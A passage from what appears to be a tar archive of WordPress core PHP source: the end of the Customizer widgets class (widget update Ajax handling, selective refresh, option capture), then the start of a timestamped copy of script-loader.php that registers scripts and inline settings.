*/
public function sanitize_sidebar_widgets_js_instance( $widget_ids ) {
global $wp_registered_widgets;
$widget_ids = array_values( array_intersect( $widget_ids, array_keys( $wp_registered_widgets ) ) );
return $widget_ids;
}
/**
* Finds and invokes the widget update and control callbacks.
*
* Requires that `$_POST` be populated with the instance data.
*
* @since 3.9.0
*
* @global array $wp_registered_widget_updates
* @global array $wp_registered_widget_controls
*
* @param string $widget_id Widget ID.
* @return array|WP_Error Array containing the updated widget information.
* A WP_Error object, otherwise.
*/
public function call_widget_update( $widget_id ) {
global $wp_registered_widget_updates, $wp_registered_widget_controls;
$setting_id = $this->get_setting_id( $widget_id );
/*
* Make sure that other setting changes have previewed since this widget
* may depend on them (e.g. Menus being present for Navigation Menu widget).
*/
if ( ! did_action( 'customize_preview_init' ) ) {
foreach ( $this->manager->settings() as $setting ) {
if ( $setting->id !== $setting_id ) {
$setting->preview();
}
}
}
$this->start_capturing_option_updates();
$parsed_id = $this->parse_widget_id( $widget_id );
$option_name = 'widget_' . $parsed_id['id_base'];
/*
* If a previously-sanitized instance is provided, populate the input vars
* with its values so that the widget update callback will read this instance
*/
$added_input_vars = array();
if ( ! empty( $_POST['sanitized_widget_setting'] ) ) {
$sanitized_widget_setting = json_decode( $this->get_post_value( 'sanitized_widget_setting' ), true );
if ( false === $sanitized_widget_setting ) {
$this->stop_capturing_option_updates();
return new WP_Error( 'widget_setting_malformed' );
}
$instance = $this->sanitize_widget_instance( $sanitized_widget_setting, $parsed_id['id_base'] );
if ( is_null( $instance ) ) {
$this->stop_capturing_option_updates();
return new WP_Error( 'widget_setting_unsanitized' );
}
if ( ! is_null( $parsed_id['number'] ) ) {
$value = array();
$value[ $parsed_id['number'] ] = $instance;
$key = 'widget-' . $parsed_id['id_base'];
$_REQUEST[ $key ] = wp_slash( $value );
$_POST[ $key ] = $_REQUEST[ $key ];
$added_input_vars[] = $key;
} else {
foreach ( $instance as $key => $value ) {
$_REQUEST[ $key ] = wp_slash( $value );
$_POST[ $key ] = $_REQUEST[ $key ];
$added_input_vars[] = $key;
}
}
}
// Invoke the widget update callback.
foreach ( (array) $wp_registered_widget_updates as $name => $control ) {
if ( $name === $parsed_id['id_base'] && is_callable( $control['callback'] ) ) {
ob_start();
call_user_func_array( $control['callback'], $control['params'] );
ob_end_clean();
break;
}
}
// Clean up any input vars that were manually added.
foreach ( $added_input_vars as $key ) {
unset( $_POST[ $key ] );
unset( $_REQUEST[ $key ] );
}
// Make sure the expected option was updated.
if ( 0 !== $this->count_captured_options() ) {
if ( $this->count_captured_options() > 1 ) {
$this->stop_capturing_option_updates();
return new WP_Error( 'widget_setting_too_many_options' );
}
$updated_option_name = key( $this->get_captured_options() );
if ( $updated_option_name !== $option_name ) {
$this->stop_capturing_option_updates();
return new WP_Error( 'widget_setting_unexpected_option' );
}
}
// Obtain the widget instance.
$option = $this->get_captured_option( $option_name );
if ( null !== $parsed_id['number'] ) {
$instance = $option[ $parsed_id['number'] ];
} else {
$instance = $option;
}
/*
* Override the incoming $_POST['customized'] for a newly-created widget's
* setting with the new $instance so that the preview filter currently
* in place from WP_Customize_Setting::preview() will use this value
* instead of the default widget instance value (an empty array).
*/
$this->manager->set_post_value( $setting_id, $this->sanitize_widget_js_instance( $instance, $parsed_id['id_base'] ) );
// Obtain the widget control with the updated instance in place.
ob_start();
$form = $wp_registered_widget_controls[ $widget_id ];
if ( $form ) {
call_user_func_array( $form['callback'], $form['params'] );
}
$form = ob_get_clean();
$this->stop_capturing_option_updates();
return compact( 'instance', 'form' );
}
/**
* Updates widget settings asynchronously.
*
* Allows the Customizer to update a widget using its form, but return the new
* instance info via Ajax instead of saving it to the options table.
*
* Most code here copied from wp_ajax_save_widget().
*
* @since 3.9.0
*
* @see wp_ajax_save_widget()
*/
public function wp_ajax_update_widget() {
if ( ! is_user_logged_in() ) {
wp_die( 0 );
}
check_ajax_referer( 'update-widget', 'nonce' );
if ( ! current_user_can( 'edit_theme_options' ) ) {
wp_die( -1 );
}
if ( empty( $_POST['widget-id'] ) ) {
wp_send_json_error( 'missing_widget-id' );
}
/** This action is documented in wp-admin/includes/ajax-actions.php */
do_action( 'load-widgets.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores
/** This action is documented in wp-admin/includes/ajax-actions.php */
do_action( 'widgets.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores
/** This action is documented in wp-admin/widgets.php */
do_action( 'sidebar_admin_setup' );
$widget_id = $this->get_post_value( 'widget-id' );
$parsed_id = $this->parse_widget_id( $widget_id );
$id_base = $parsed_id['id_base'];
$is_updating_widget_template = (
isset( $_POST[ 'widget-' . $id_base ] )
&&
is_array( $_POST[ 'widget-' . $id_base ] )
&&
preg_match( '/__i__|%i%/', key( $_POST[ 'widget-' . $id_base ] ) )
);
if ( $is_updating_widget_template ) {
wp_send_json_error( 'template_widget_not_updatable' );
}
$updated_widget = $this->call_widget_update( $widget_id ); // => {instance,form}
if ( is_wp_error( $updated_widget ) ) {
wp_send_json_error( $updated_widget->get_error_code() );
}
$form = $updated_widget['form'];
$instance = $this->sanitize_widget_js_instance( $updated_widget['instance'], $id_base );
wp_send_json_success( compact( 'form', 'instance' ) );
}
/*
* Selective Refresh Methods
*/
/**
* Filters arguments for dynamic widget partials.
*
* @since 4.5.0
*
* @param array|false $partial_args Partial arguments.
* @param string $partial_id Partial ID.
* @return array (Maybe) modified partial arguments.
*/
public function customize_dynamic_partial_args( $partial_args, $partial_id ) {
if ( ! current_theme_supports( 'customize-selective-refresh-widgets' ) ) {
return $partial_args;
}
if ( preg_match( '/^widget\[(?P<widget_id>.+)\]$/', $partial_id, $matches ) ) {
if ( false === $partial_args ) {
$partial_args = array();
}
$partial_args = array_merge(
$partial_args,
array(
'type' => 'widget',
'render_callback' => array( $this, 'render_widget_partial' ),
'container_inclusive' => true,
'settings' => array( $this->get_setting_id( $matches['widget_id'] ) ),
'capability' => 'edit_theme_options',
)
);
}
return $partial_args;
}
/**
* Adds hooks for selective refresh.
*
* @since 4.5.0
*/
public function selective_refresh_init() {
if ( ! current_theme_supports( 'customize-selective-refresh-widgets' ) ) {
return;
}
add_filter( 'dynamic_sidebar_params', array( $this, 'filter_dynamic_sidebar_params' ) );
add_filter( 'wp_kses_allowed_html', array( $this, 'filter_wp_kses_allowed_data_attributes' ) );
add_action( 'dynamic_sidebar_before', array( $this, 'start_dynamic_sidebar' ) );
add_action( 'dynamic_sidebar_after', array( $this, 'end_dynamic_sidebar' ) );
}
/**
* Inject selective refresh data attributes into widget container elements.
*
* @since 4.5.0
*
* @see WP_Customize_Nav_Menus::filter_wp_nav_menu_args()
*
* @param array $params {
* Dynamic sidebar params.
*
* @type array $args Sidebar args.
* @type array $widget_args Widget args.
* }
* @return array Params.
*/
public function filter_dynamic_sidebar_params( $params ) {
$sidebar_args = array_merge(
array(
'before_widget' => '',
'after_widget' => '',
),
$params[0]
);
// Skip widgets not in a registered sidebar or ones which lack a proper wrapper element to attach the data-* attributes to.
$matches = array();
$is_valid = (
isset( $sidebar_args['id'] )
&&
is_registered_sidebar( $sidebar_args['id'] )
&&
( isset( $this->current_dynamic_sidebar_id_stack[0] ) && $this->current_dynamic_sidebar_id_stack[0] === $sidebar_args['id'] )
&&
preg_match( '#^<(?P<tag_name>\w+)#', $sidebar_args['before_widget'], $matches )
);
if ( ! $is_valid ) {
return $params;
}
$this->before_widget_tags_seen[ $matches['tag_name'] ] = true;
$context = array(
'sidebar_id' => $sidebar_args['id'],
);
if ( isset( $this->context_sidebar_instance_number ) ) {
$context['sidebar_instance_number'] = $this->context_sidebar_instance_number;
} elseif ( isset( $sidebar_args['id'] ) && isset( $this->sidebar_instance_count[ $sidebar_args['id'] ] ) ) {
$context['sidebar_instance_number'] = $this->sidebar_instance_count[ $sidebar_args['id'] ];
}
$attributes = sprintf( ' data-customize-partial-id="%s"', esc_attr( 'widget[' . $sidebar_args['widget_id'] . ']' ) );
$attributes .= ' data-customize-partial-type="widget"';
$attributes .= sprintf( ' data-customize-partial-placement-context="%s"', esc_attr( wp_json_encode( $context ) ) );
$attributes .= sprintf( ' data-customize-widget-id="%s"', esc_attr( $sidebar_args['widget_id'] ) );
$sidebar_args['before_widget'] = preg_replace( '#^(<\w+)#', '$1 ' . $attributes, $sidebar_args['before_widget'] );
$params[0] = $sidebar_args;
return $params;
}
/**
* List of the tag names seen for before_widget strings.
*
* This is used in the {@see 'filter_wp_kses_allowed_html'} filter to ensure that the
* data-* attributes can be allowed.
*
* @since 4.5.0
* @var array
*/
protected $before_widget_tags_seen = array();
/**
* Ensures the HTML data-* attributes for selective refresh are allowed by kses.
*
* This is needed in case the `$before_widget` is run through wp_kses() when printed.
*
* @since 4.5.0
*
* @param array $allowed_html Allowed HTML.
* @return array (Maybe) modified allowed HTML.
*/
public function filter_wp_kses_allowed_data_attributes( $allowed_html ) {
foreach ( array_keys( $this->before_widget_tags_seen ) as $tag_name ) {
if ( ! isset( $allowed_html[ $tag_name ] ) ) {
$allowed_html[ $tag_name ] = array();
}
$allowed_html[ $tag_name ] = array_merge(
$allowed_html[ $tag_name ],
array_fill_keys(
array(
'data-customize-partial-id',
'data-customize-partial-type',
'data-customize-partial-placement-context',
'data-customize-partial-widget-id',
'data-customize-partial-options',
),
true
)
);
}
return $allowed_html;
}
/**
* Keep track of the number of times that dynamic_sidebar() was called for a given sidebar index.
*
* This helps facilitate the uncommon scenario where a single sidebar is rendered multiple times on a template.
*
* @since 4.5.0
* @var array
*/
protected $sidebar_instance_count = array();
/**
* The current request's sidebar_instance_number context.
*
* @since 4.5.0
* @var int|null
*/
protected $context_sidebar_instance_number;
/**
* Current sidebar ID being rendered.
*
* @since 4.5.0
* @var array
*/
protected $current_dynamic_sidebar_id_stack = array();
/**
* Begins keeping track of the current sidebar being rendered.
*
* Insert marker before widgets are rendered in a dynamic sidebar.
*
* @since 4.5.0
*
* @param int|string $index Index, name, or ID of the dynamic sidebar.
*/
public function start_dynamic_sidebar( $index ) {
array_unshift( $this->current_dynamic_sidebar_id_stack, $index );
if ( ! isset( $this->sidebar_instance_count[ $index ] ) ) {
$this->sidebar_instance_count[ $index ] = 0;
}
$this->sidebar_instance_count[ $index ] += 1;
if ( ! $this->manager->selective_refresh->is_render_partials_request() ) {
printf( "\n<!--dynamic_sidebar_before:%s:%d-->\n", esc_html( $index ), (int) $this->sidebar_instance_count[ $index ] );
}
}
/**
* Finishes keeping track of the current sidebar being rendered.
*
* Inserts a marker after widgets are rendered in a dynamic sidebar.
*
* @since 4.5.0
*
* @param int|string $index Index, name, or ID of the dynamic sidebar.
*/
public function end_dynamic_sidebar( $index ) {
array_shift( $this->current_dynamic_sidebar_id_stack );
if ( ! $this->manager->selective_refresh->is_render_partials_request() ) {
printf( "\n<!--dynamic_sidebar_after:%s:%d-->\n", esc_html( $index ), (int) $this->sidebar_instance_count[ $index ] );
}
}
/**
* Current sidebar being rendered.
*
* @since 4.5.0
* @var string|null
*/
protected $rendering_widget_id;
/**
* Current widget being rendered.
*
* @since 4.5.0
* @var string|null
*/
protected $rendering_sidebar_id;
/**
* Filters sidebars_widgets to ensure the currently-rendered widget is the only widget in the current sidebar.
*
* @since 4.5.0
*
* @param array $sidebars_widgets Sidebars widgets.
* @return array Filtered sidebars widgets.
*/
public function filter_sidebars_widgets_for_rendering_widget( $sidebars_widgets ) {
$sidebars_widgets[ $this->rendering_sidebar_id ] = array( $this->rendering_widget_id );
return $sidebars_widgets;
}
/**
* Renders a specific widget using the supplied sidebar arguments.
*
* @since 4.5.0
*
* @see dynamic_sidebar()
*
* @param WP_Customize_Partial $partial Partial.
* @param array $context {
* Sidebar args supplied as container context.
*
* @type string $sidebar_id ID for sidebar for widget to render into.
* @type int $sidebar_instance_number Disambiguating instance number.
* }
* @return string|false
*/
public function render_widget_partial( $partial, $context ) {
$id_data = $partial->id_data();
$widget_id = array_shift( $id_data['keys'] );
if ( ! is_array( $context )
|| empty( $context['sidebar_id'] )
|| ! is_registered_sidebar( $context['sidebar_id'] )
) {
return false;
}
$this->rendering_sidebar_id = $context['sidebar_id'];
if ( isset( $context['sidebar_instance_number'] ) ) {
$this->context_sidebar_instance_number = (int) $context['sidebar_instance_number'];
}
// Filter sidebars_widgets so that only the queried widget is in the sidebar.
$this->rendering_widget_id = $widget_id;
$filter_callback = array( $this, 'filter_sidebars_widgets_for_rendering_widget' );
add_filter( 'sidebars_widgets', $filter_callback, 1000 );
// Render the widget.
ob_start();
$this->rendering_sidebar_id = $context['sidebar_id'];
dynamic_sidebar( $this->rendering_sidebar_id );
$container = ob_get_clean();
// Reset variables for next partial render.
remove_filter( 'sidebars_widgets', $filter_callback, 1000 );
$this->context_sidebar_instance_number = null;
$this->rendering_sidebar_id = null;
$this->rendering_widget_id = null;
return $container;
}
//
// Option Update Capturing.
//
/**
* List of captured widget option updates.
*
* @since 3.9.0
* @var array $_captured_options Values updated while option capture is happening.
*/
protected $_captured_options = array();
/**
* Whether option capture is currently happening.
*
* @since 3.9.0
* @var bool $_is_current Whether option capture is currently happening or not.
*/
protected $_is_capturing_option_updates = false;
/**
* Determines whether the captured option update should be ignored.
*
* @since 3.9.0
*
* @param string $option_name Option name.
* @return bool Whether the option capture is ignored.
*/
protected function is_option_capture_ignored( $option_name ) {
return ( str_starts_with( $option_name, '_transient_' ) );
}
/**
* Retrieves captured widget option updates.
*
* @since 3.9.0
*
* @return array Array of captured options.
*/
protected function get_captured_options() {
return $this->_captured_options;
}
/**
* Retrieves the option that was captured from being saved.
*
* @since 4.2.0
*
* @param string $option_name Option name.
* @param mixed $default_value Optional. Default value to return if the option does not exist. Default false.
* @return mixed Value set for the option.
*/
protected function get_captured_option( $option_name, $default_value = false ) {
if ( array_key_exists( $option_name, $this->_captured_options ) ) {
$value = $this->_captured_options[ $option_name ];
} else {
$value = $default_value;
}
return $value;
}
/**
* Retrieves the number of captured widget option updates.
*
* @since 3.9.0
*
* @return int Number of updated options.
*/
protected function count_captured_options() {
return count( $this->_captured_options );
}
/**
* Begins keeping track of changes to widget options, caching new values.
*
* @since 3.9.0
*/
protected function start_capturing_option_updates() {
if ( $this->_is_capturing_option_updates ) {
return;
}
$this->_is_capturing_option_updates = true;
add_filter( 'pre_update_option', array( $this, 'capture_filter_pre_update_option' ), 10, 3 );
}
/**
* Pre-filters captured option values before updating.
*
* @since 3.9.0
*
* @param mixed $new_value The new option value.
* @param string $option_name Name of the option.
* @param mixed $old_value The old option value.
* @return mixed Filtered option value.
*/
public function capture_filter_pre_update_option( $new_value, $option_name, $old_value ) {
if ( $this->is_option_capture_ignored( $option_name ) ) {
return $new_value;
}
if ( ! isset( $this->_captured_options[ $option_name ] ) ) {
add_filter( "pre_option_{$option_name}", array( $this, 'capture_filter_pre_get_option' ) );
}
$this->_captured_options[ $option_name ] = $new_value;
return $old_value;
}
/**
* Pre-filters captured option values before retrieving.
*
* @since 3.9.0
*
* @param mixed $value Value to return instead of the option value.
* @return mixed Filtered option value.
*/
public function capture_filter_pre_get_option( $value ) {
$option_name = preg_replace( '/^pre_option_/', '', current_filter() );
if ( isset( $this->_captured_options[ $option_name ] ) ) {
$value = $this->_captured_options[ $option_name ];
/** This filter is documented in wp-includes/option.php */
$value = apply_filters( 'option_' . $option_name, $value, $option_name );
}
return $value;
}
/**
* Undoes any changes to the options since options capture began.
*
* @since 3.9.0
*/
protected function stop_capturing_option_updates() {
if ( ! $this->_is_capturing_option_updates ) {
return;
}
remove_filter( 'pre_update_option', array( $this, 'capture_filter_pre_update_option' ), 10 );
foreach ( array_keys( $this->_captured_options ) as $option_name ) {
remove_filter( "pre_option_{$option_name}", array( $this, 'capture_filter_pre_get_option' ) );
}
$this->_captured_options = array();
$this->_is_capturing_option_updates = false;
}
/**
* {@internal Missing Summary}
*
* See the {@see 'customize_dynamic_setting_args'} filter.
*
* @since 3.9.0
* @deprecated 4.2.0 Deprecated in favor of the {@see 'customize_dynamic_setting_args'} filter.
*/
public function setup_widget_addition_previews() {
_deprecated_function( __METHOD__, '4.2.0', 'customize_dynamic_setting_args' );
}
/**
* {@internal Missing Summary}
*
* See the {@see 'customize_dynamic_setting_args'} filter.
*
* @since 3.9.0
* @deprecated 4.2.0 Deprecated in favor of the {@see 'customize_dynamic_setting_args'} filter.
*/
public function prepreview_added_sidebars_widgets() {
_deprecated_function( __METHOD__, '4.2.0', 'customize_dynamic_setting_args' );
}
/**
* {@internal Missing Summary}
*
* See the {@see 'customize_dynamic_setting_args'} filter.
*
* @since 3.9.0
* @deprecated 4.2.0 Deprecated in favor of the {@see 'customize_dynamic_setting_args'} filter.
*/
public function prepreview_added_widget_instance() {
_deprecated_function( __METHOD__, '4.2.0', 'customize_dynamic_setting_args' );
}
/**
* {@internal Missing Summary}
*
* See the {@see 'customize_dynamic_setting_args'} filter.
*
* @since 3.9.0
* @deprecated 4.2.0 Deprecated in favor of the {@see 'customize_dynamic_setting_args'} filter.
*/
public function remove_prepreview_filters() {
_deprecated_function( __METHOD__, '4.2.0', 'customize_dynamic_setting_args' );
}
}
script-loader-20260605041519.php 0000666 00000465210 15224151220 0011421 0 ustar 00 <?php
/**
* WordPress scripts and styles default loader.
*
* Several constants are used to manage the loading, concatenating and compression of scripts and CSS:
* define('SCRIPT_DEBUG', true); loads the development (non-minified) versions of all scripts and CSS, and disables compression and concatenation,
* define('CONCATENATE_SCRIPTS', false); disables compression and concatenation of scripts and CSS,
* define('COMPRESS_SCRIPTS', false); disables compression of scripts,
* define('COMPRESS_CSS', false); disables compression of CSS,
* define('ENFORCE_GZIP', true); forces gzip for compression (default is deflate).
*
* The globals $concatenate_scripts, $compress_scripts and $compress_css can be set by plugins
* to temporarily override the above settings. Also a compression test is run once and the result is saved
* as option 'can_compress_scripts' (0/1). The test will run again if that option is deleted.
*
* @package WordPress
*/
/** WordPress Dependency Class */
require ABSPATH . WPINC . '/class-wp-dependency.php';
/** WordPress Dependencies Class */
require ABSPATH . WPINC . '/class-wp-dependencies.php';
/** WordPress Scripts Class */
require ABSPATH . WPINC . '/class-wp-scripts.php';
/** WordPress Scripts Functions */
require ABSPATH . WPINC . '/functions.wp-scripts.php';
/** WordPress Styles Class */
require ABSPATH . WPINC . '/class-wp-styles.php';
/** WordPress Styles Functions */
require ABSPATH . WPINC . '/functions.wp-styles.php';
/**
* Registers TinyMCE scripts.
*
* @since 5.0.0
*
* @global string $tinymce_version
* @global bool $concatenate_scripts
* @global bool $compress_scripts
*
* @param WP_Scripts $scripts WP_Scripts object.
* @param bool $force_uncompressed Whether to forcibly prevent gzip compression. Default false.
*/
function wp_register_tinymce_scripts( $scripts, $force_uncompressed = false ) {
global $tinymce_version, $concatenate_scripts, $compress_scripts;
$suffix = wp_scripts_get_suffix();
$dev_suffix = wp_scripts_get_suffix( 'dev' );
script_concat_settings();
$compressed = $compress_scripts && $concatenate_scripts && ! $force_uncompressed;
/*
* Load tinymce.js when running from /src, otherwise load wp-tinymce.js (in production)
* or tinymce.min.js (when SCRIPT_DEBUG is true).
*/
if ( $compressed ) {
$scripts->add( 'wp-tinymce', includes_url( 'js/tinymce/' ) . 'wp-tinymce.js', array(), $tinymce_version );
} else {
$scripts->add( 'wp-tinymce-root', includes_url( 'js/tinymce/' ) . "tinymce$dev_suffix.js", array(), $tinymce_version );
$scripts->add( 'wp-tinymce', includes_url( 'js/tinymce/' ) . "plugins/compat3x/plugin$dev_suffix.js", array( 'wp-tinymce-root' ), $tinymce_version );
}
$scripts->add( 'wp-tinymce-lists', includes_url( "js/tinymce/plugins/lists/plugin$suffix.js" ), array( 'wp-tinymce' ), $tinymce_version );
}
/**
* Registers all the WordPress vendor scripts that are in the standardized
* `js/dist/vendor/` location.
*
* For the order of `$scripts->add` see `wp_default_scripts`.
*
* @since 5.0.0
*
* @global WP_Locale $wp_locale WordPress date and time locale object.
*
* @param WP_Scripts $scripts WP_Scripts object.
*/
function wp_default_packages_vendor( $scripts ) {
global $wp_locale;
$suffix = wp_scripts_get_suffix();
$vendor_scripts = array(
'react',
'react-dom' => array( 'react' ),
'react-jsx-runtime' => array( 'react' ),
'regenerator-runtime',
'moment',
'lodash',
'wp-polyfill-fetch',
'wp-polyfill-formdata',
'wp-polyfill-node-contains',
'wp-polyfill-url',
'wp-polyfill-dom-rect',
'wp-polyfill-element-closest',
'wp-polyfill-object-fit',
'wp-polyfill-inert',
'wp-polyfill',
);
$vendor_scripts_versions = array(
'react' => '18.3.1.1', // Final .1 due to switch to UMD build, can be removed in the next update.
'react-dom' => '18.3.1.1', // Final .1 due to switch to UMD build, can be removed in the next update.
'react-jsx-runtime' => '18.3.1',
'regenerator-runtime' => '0.14.1',
'moment' => '2.30.1',
'lodash' => '4.17.21',
'wp-polyfill-fetch' => '3.6.20',
'wp-polyfill-formdata' => '4.0.10',
'wp-polyfill-node-contains' => '4.8.0',
'wp-polyfill-url' => '3.6.4',
'wp-polyfill-dom-rect' => '4.8.0',
'wp-polyfill-element-closest' => '3.0.2',
'wp-polyfill-object-fit' => '2.3.5',
'wp-polyfill-inert' => '3.1.3',
'wp-polyfill' => '3.15.0',
);
foreach ( $vendor_scripts as $handle => $dependencies ) {
if ( is_string( $dependencies ) ) {
$handle = $dependencies;
$dependencies = array();
}
$path = "/wp-includes/js/dist/vendor/$handle$suffix.js";
$version = $vendor_scripts_versions[ $handle ];
$scripts->add( $handle, $path, $dependencies, $version, 1 );
}
did_action( 'init' ) && $scripts->add_inline_script( 'lodash', 'window.lodash = _.noConflict();' );
did_action( 'init' ) && $scripts->add_inline_script(
'moment',
sprintf(
"moment.updateLocale( '%s', %s );",
esc_js( get_user_locale() ),
wp_json_encode(
array(
'months' => array_values( $wp_locale->month ),
'monthsShort' => array_values( $wp_locale->month_abbrev ),
'weekdays' => array_values( $wp_locale->weekday ),
'weekdaysShort' => array_values( $wp_locale->weekday_abbrev ),
'week' => array(
'dow' => (int) get_option( 'start_of_week', 0 ),
),
'longDateFormat' => array(
'LT' => get_option( 'time_format', __( 'g:i a' ) ),
'LTS' => null,
'L' => null,
'LL' => get_option( 'date_format', __( 'F j, Y' ) ),
'LLL' => __( 'F j, Y g:i a' ),
'LLLL' => null,
),
),
JSON_HEX_TAG | JSON_UNESCAPED_SLASHES
)
),
'after'
);
}
/**
* Returns contents of an inline script used in appending polyfill scripts for
* browsers which fail the provided tests. The provided array is a mapping from
* a condition to verify feature support to its polyfill script handle.
*
* @since 5.0.0
*
* @param WP_Scripts $scripts WP_Scripts object.
* @param string[] $tests Features to detect.
* @return string Conditional polyfill inline script.
*/
function wp_get_script_polyfill( $scripts, $tests ) {
$polyfill = '';
foreach ( $tests as $test => $handle ) {
if ( ! array_key_exists( $handle, $scripts->registered ) ) {
continue;
}
$src = $scripts->registered[ $handle ]->src;
$ver = $scripts->registered[ $handle ]->ver;
if ( ! preg_match( '|^(https?:)?//|', $src ) && ! ( $scripts->content_url && str_starts_with( $src, $scripts->content_url ) ) ) {
$src = $scripts->base_url . $src;
}
if ( ! empty( $ver ) ) {
$src = add_query_arg( 'ver', $ver, $src );
}
/** This filter is documented in wp-includes/class-wp-scripts.php */
$src = esc_url( apply_filters( 'script_loader_src', $src, $handle ) );
if ( ! $src ) {
continue;
}
$polyfill .= (
// Test presence of feature...
'( ' . $test . ' ) || ' .
/*
* ...appending polyfill on any failures. Cautious viewers may balk
* at the `document.write`. Its caveat of synchronous mid-stream
* blocking write is exactly the behavior we need though.
*/
'document.write( \'<script src="' .
$src .
'"></scr\' + \'ipt>\' );'
);
}
return $polyfill;
}
/**
* Registers development scripts that integrate with `@wordpress/scripts`.
*
* @see https://github.com/WordPress/gutenberg/tree/trunk/packages/scripts#start
*
* @since 6.0.0
*
* @param WP_Scripts $scripts WP_Scripts object.
*/
function wp_register_development_scripts( $scripts ) {
if (
! defined( 'SCRIPT_DEBUG' ) || ! SCRIPT_DEBUG
|| empty( $scripts->registered['react'] )
|| defined( 'WP_RUN_CORE_TESTS' )
) {
return;
}
$development_scripts = array(
'react-refresh-entry',
'react-refresh-runtime',
);
foreach ( $development_scripts as $script_name ) {
$assets = include ABSPATH . WPINC . '/assets/script-loader-' . $script_name . '.php';
if ( ! is_array( $assets ) ) {
return;
}
$scripts->add(
'wp-' . $script_name,
'/wp-includes/js/dist/development/' . $script_name . '.js',
$assets['dependencies'],
$assets['version']
);
}
// See https://github.com/pmmmwh/react-refresh-webpack-plugin/blob/main/docs/TROUBLESHOOTING.md#externalising-react.
$scripts->registered['react']->deps[] = 'wp-react-refresh-entry';
}
/**
* Registers all the WordPress packages scripts that are in the standardized
* `js/dist/` location.
*
* For the order of `$scripts->add` see `wp_default_scripts`.
*
* @since 5.0.0
*
* @param WP_Scripts $scripts WP_Scripts object.
*/
function wp_default_packages_scripts( $scripts ) {
$suffix = defined( 'WP_RUN_CORE_TESTS' ) ? '.min' : wp_scripts_get_suffix();
/*
* Expects multidimensional array like:
*
* 'a11y.js' => array('dependencies' => array(...), 'version' => '...'),
* 'annotations.js' => array('dependencies' => array(...), 'version' => '...'),
* 'api-fetch.js' => array(...
*/
$assets = include ABSPATH . WPINC . "/assets/script-loader-packages{$suffix}.php";
foreach ( $assets as $file_name => $package_data ) {
$basename = str_replace( $suffix . '.js', '', basename( $file_name ) );
$handle = 'wp-' . $basename;
$path = "/wp-includes/js/dist/{$basename}{$suffix}.js";
if ( ! empty( $package_data['dependencies'] ) ) {
$dependencies = $package_data['dependencies'];
} else {
$dependencies = array();
}
// Add dependencies that cannot be detected and generated by build tools.
switch ( $handle ) {
case 'wp-block-library':
array_push( $dependencies, 'editor' );
break;
case 'wp-edit-post':
array_push( $dependencies, 'media-models', 'media-views', 'postbox', 'wp-dom-ready' );
break;
case 'wp-preferences':
array_push( $dependencies, 'wp-preferences-persistence' );
break;
}
$scripts->add( $handle, $path, $dependencies, $package_data['version'], 1 );
if ( in_array( 'wp-i18n', $dependencies, true ) ) {
$scripts->set_translations( $handle );
}
/*
* Manually set the text direction localization after wp-i18n is printed.
* This ensures that wp.i18n.isRTL() returns true in RTL languages.
* We cannot use $scripts->set_translations( 'wp-i18n' ) to do this
* because WordPress prints a script's translations *before* the script,
* which means, in the case of wp-i18n, that wp.i18n.setLocaleData()
* is called before wp.i18n is defined.
*/
if ( 'wp-i18n' === $handle ) {
$ltr = _x( 'ltr', 'text direction' );
$script = sprintf( "wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ '%s' ] } );", $ltr );
$scripts->add_inline_script( $handle, $script, 'after' );
}
}
}
/**
* Adds inline scripts required for the WordPress JavaScript packages.
*
* @since 5.0.0
* @since 6.4.0 Added relative time strings for the `wp-date` inline script output.
*
* @global WP_Locale $wp_locale WordPress date and time locale object.
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param WP_Scripts $scripts WP_Scripts object.
*/
function wp_default_packages_inline_scripts( $scripts ) {
global $wp_locale, $wpdb;
if ( isset( $scripts->registered['wp-api-fetch'] ) ) {
$scripts->registered['wp-api-fetch']->deps[] = 'wp-hooks';
}
$scripts->add_inline_script(
'wp-api-fetch',
sprintf(
'wp.apiFetch.use( wp.apiFetch.createRootURLMiddleware( "%s" ) );',
sanitize_url( get_rest_url() )
),
'after'
);
$scripts->add_inline_script(
'wp-api-fetch',
implode(
"\n",
array(
sprintf(
'wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( "%s" );',
wp_installing() ? '' : wp_create_nonce( 'wp_rest' )
),
'wp.apiFetch.use( wp.apiFetch.nonceMiddleware );',
'wp.apiFetch.use( wp.apiFetch.mediaUploadMiddleware );',
sprintf(
'wp.apiFetch.nonceEndpoint = "%s";',
admin_url( 'admin-ajax.php?action=rest-nonce' )
),
)
),
'after'
);
$meta_key = $wpdb->get_blog_prefix() . 'persisted_preferences';
$user_id = get_current_user_id();
$preload_data = get_user_meta( $user_id, $meta_key, true );
$scripts->add_inline_script(
'wp-preferences',
sprintf(
'( function() {
var serverData = %s;
var userId = "%d";
var persistenceLayer = wp.preferencesPersistence.__unstableCreatePersistenceLayer( serverData, userId );
var preferencesStore = wp.preferences.store;
wp.data.dispatch( preferencesStore ).setPersistenceLayer( persistenceLayer );
} ) ();',
wp_json_encode( $preload_data, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ),
$user_id
)
);
// Backwards compatibility - configure the old wp-data persistence system.
$scripts->add_inline_script(
'wp-data',
implode(
"\n",
array(
'( function() {',
' var userId = ' . get_current_user_id() . ';',
' var storageKey = "WP_DATA_USER_" + userId;',
' wp.data',
' .use( wp.data.plugins.persistence, { storageKey: storageKey } );',
'} )();',
)
)
);
// Calculate the timezone abbr (EDT, PST) if possible.
$timezone_string = get_option( 'timezone_string', 'UTC' );
$timezone_abbr = '';
if ( ! empty( $timezone_string ) ) {
$timezone_date = new DateTime( 'now', new DateTimeZone( $timezone_string ) );
$timezone_abbr = $timezone_date->format( 'T' );
}
$gmt_offset = get_option( 'gmt_offset', 0 );
$scripts->add_inline_script(
'wp-date',
sprintf(
'wp.date.setSettings( %s );',
wp_json_encode(
array(
'l10n' => array(
'locale' => get_user_locale(),
'months' => array_values( $wp_locale->month ),
'monthsShort' => array_values( $wp_locale->month_abbrev ),
'weekdays' => array_values( $wp_locale->weekday ),
'weekdaysShort' => array_values( $wp_locale->weekday_abbrev ),
'meridiem' => (object) $wp_locale->meridiem,
'relative' => array(
/* translators: %s: Duration. */
'future' => __( '%s from now' ),
/* translators: %s: Duration. */
'past' => __( '%s ago' ),
/* translators: One second from or to a particular datetime, e.g., "a second ago" or "a second from now". */
's' => __( 'a second' ),
/* translators: %d: Duration in seconds from or to a particular datetime, e.g., "4 seconds ago" or "4 seconds from now". */
'ss' => __( '%d seconds' ),
